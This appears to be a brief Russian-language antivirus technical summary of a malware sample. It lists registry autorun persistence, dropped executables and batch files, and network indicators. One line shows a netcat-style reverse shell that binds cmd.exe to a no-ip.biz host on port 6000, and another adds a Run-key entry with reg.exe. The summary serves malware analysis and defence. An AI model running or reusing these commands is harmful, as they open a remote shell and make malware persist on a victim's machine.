Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Systemrun' = '<SYSTEM32>\cmk.exe'
- <SYSTEM32>\Systemrun.exe -d -e cmd.exe bhisorx1.no-ip.biz 6000
- <SYSTEM32>\cmk.exe
- <SYSTEM32>\reg.exe add hklm\software\microsoft\windows\currentversion\run /v Systemrun /t reg_sz /d <SYSTEM32>\cmk.exe /f
- %TEMP%\~1.bat
- <SYSTEM32>\systemini.bat
- <SYSTEM32>\Systemrun.exe
- %TEMP%\sfx.ini
- <SYSTEM32>\cmk.exe
- %TEMP%\~1.bat
- %TEMP%\sfx.ini
- 'bh####x1.no-ip.biz':6000
- DNS ASK bh####x1.no-ip.biz